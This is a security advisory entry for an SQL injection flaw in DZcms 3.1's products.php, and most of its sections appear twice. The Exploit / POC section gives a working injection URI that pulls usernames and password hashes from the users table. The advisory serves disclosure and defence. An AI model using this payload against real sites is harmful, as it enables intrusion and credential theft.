DeZine DZcms 'products.php' SQL Injection Vulnerability
BID:33194
Info
DeZine DZcms 'products.php' SQL Injection Vulnerability
| Bugtraq ID: | 33194 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2009 12:00AM |
| Updated: | Jan 15 2009 06:32PM |
| Credit: | Glafkos Charalambous |
| Vulnerable: |
DeZine DZ cms 3.1 |
| Not Vulnerable: | |
Discussion
DeZine DZcms 'products.php' SQL Injection Vulnerability
DZcms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DZcms 3.1 is vulnerable; other versions may also be affected.
DZcms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DZcms 3.1 is vulnerable; other versions may also be affected.
Exploit / POC
DeZine DZcms 'products.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*
Solution / Fix
DeZine DZcms 'products.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].